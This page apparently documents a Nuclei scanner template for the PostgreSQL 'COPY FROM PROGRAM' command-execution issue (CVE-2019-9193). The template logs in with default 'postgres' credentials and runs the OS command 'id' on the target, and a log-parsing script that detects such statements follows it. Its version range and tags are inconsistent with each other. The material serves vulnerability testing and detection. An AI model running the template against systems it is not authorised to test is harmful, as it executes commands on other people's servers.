PostgreSQL 9.3-12.3 Authenticated Remote Code Execution
ID: CVE-2019-9193
Severity: high
Author: pussycat0x
Tags: cve,cve2018,js,network,postgresql,intrusive
Description
In PostgreSQL 9.3 through 11.2, the “COPY TO/FROM PROGRAM” function allows superusers and users in the ‘pg_execute_server_program’ group to execute arbitrary code in the context of the database’s operating system user. This functionality is enabled by default and can be abused to run arbitrary operating system commands on Windows, Linux, and macOS. NOTE: Third parties claim/state this is not an issue because PostgreSQL functionality for ‘COPY TO/FROM PROGRAM’ is acting as intended. References state that in PostgreSQL, a superuser can execute commands as the server user without using the ‘COPY FROM PROGRAM’.
YAML Source
id: CVE-2019-9193

info:
  name: PostgreSQL 9.3-12.3 Authenticated Remote Code Execution
  author: pussycat0x
  severity: high
  description: |
    In PostgreSQL 9.3 through 11.2, the "COPY TO/FROM PROGRAM" function allows superusers and users in the 'pg_execute_server_program' group to execute arbitrary code in the context of the database's operating system user. This functionality is enabled by default and can be abused to run arbitrary operating system commands on Windows, Linux, and macOS. NOTE: Third parties claim/state this is not an issue because PostgreSQL functionality for ‘COPY TO/FROM PROGRAM’ is acting as intended. References state that in PostgreSQL, a superuser can execute commands as the server user without using the ‘COPY FROM PROGRAM’.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/postgres/CVE-2019-9193
  metadata:
    verified: true
    max-request: 1
    shodan-query: "product:\"PostgreSQL\""
  tags: cve,cve2018,js,network,postgresql,intrusive

javascript:
  - pre-condition: |
      isPortOpen(Host,Port);
    code: |
      const postgres = require('nuclei/postgres');
      const client = new postgres.PGClient;
      const tbl = tbl_exec
      const qry = ["CREATE TABLE "+tbl+"(cmd_output text);", "COPY "+tbl + " FROM PROGRAM 'id';", "SELECT * FROM "+ tbl+";", "DROP TABLE IF EXISTS " +tbl+";",];
      for (const x of qry){
        connected = client.ExecuteQuery(Host, Port, User, Pass, Db, x);
        Export(connected);
      }

    args:
      Host: "{{Host}}"
      Port: 5432
      User: "{{usernames}}"
      Pass: "{{password}}"
      Db: "{{database}}"
      tbl_exec: "{{randbase(5)}}"

    payloads:
      usernames:
        - postgres
      database:
        - postgres
      password:
        - postgres

    attack: clusterbomb

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"

      - type: word
        words:
          - "cmd_output"
# digest: 4b0a00483046022100ce439b628e4c6bf983fc5344bfa8846f824b547245943f2baf520b549193041b022100a99a6d5705530c714ff4040f222306292aa3649798b292f89ca81b4825cb7398:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "javascript/cves/2019/CVE-2019-9193.yaml"
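On the server side, the statement this template sends shows up in the PostgreSQL statement log, so the same behavior can be detected there. The following is an added example, not part of the template or of Nuclei: the function name `findCopyProgram`, the `log_line_prefix` layout and the sample log lines are assumptions constructed for illustration.

```javascript
// Constructed sample log. Assumes log_line_prefix = '%m [%p] %u@%d ' and
// log_statement = 'all' ('mod' records COPY FROM but not COPY TO).
const SAMPLE_LOG = [
  "2024-05-01 10:00:01.120 UTC [4242] postgres@postgres LOG:  statement: CREATE TABLE abcde(cmd_output text);",
  "2024-05-01 10:00:01.131 UTC [4242] postgres@postgres LOG:  statement: COPY abcde FROM PROGRAM 'id';",
  "2024-05-01 10:00:01.140 UTC [4242] postgres@postgres LOG:  statement: SELECT * FROM abcde;",
  "2024-05-01 10:05:09.002 UTC [4310] etl@sales LOG:  statement: COPY orders FROM '/srv/import/orders.csv' WITH (FORMAT csv);",
  "2024-05-01 10:06:44.518 UTC [4311] report@sales LOG:  statement: copy (select * from orders)",
  "\tto program 'gzip > /tmp/orders.gz';",
  "2024-05-01 10:07:00.000 UTC [4312] app@sales LOG:  statement: SELECT 'COPY t FROM PROGRAM' AS note;",
].join("\n");

// Prefix fields: timestamp, backend pid, user, database, statement text.
const PREFIX = /^(\S+ \S+ \S+) \[(\d+)\] ([^@\s]+)@(\S+) LOG:\s+statement: (.*)$/;
// COPY <table | (query)> FROM|TO PROGRAM '<command>', anchored at the start of
// the statement so the phrase inside another statement's string literal is ignored.
const COPY_PROGRAM = /^\s*COPY\s+[\s\S]+?\s+(FROM|TO)\s+PROGRAM\s+'((?:[^']|'')*)'/i;

function findCopyProgram(logText) {
  // PostgreSQL indents continuation lines of a multi-line statement with a tab;
  // fold them back into the entry they belong to before matching.
  const entries = [];
  for (const line of logText.split("\n")) {
    if (line.startsWith("\t") && entries.length > 0) {
      entries[entries.length - 1] += " " + line.trim();
    } else {
      entries.push(line);
    }
  }
  const findings = [];
  for (const entry of entries) {
    const m = PREFIX.exec(entry);
    if (!m) continue;
    const c = COPY_PROGRAM.exec(m[5]);
    if (!c) continue;
    findings.push({
      time: m[1], pid: Number(m[2]), user: m[3], db: m[4],
      direction: c[1].toUpperCase(),
      command: c[2].replace(/''/g, "'"), // undo SQL quote doubling
    });
  }
  return findings;
}

console.log(findCopyProgram(SAMPLE_LOG));
```

Each finding carries the role and database that issued the statement, which can then be compared against the roles expected to hold superuser or `pg_execute_server_program` membership.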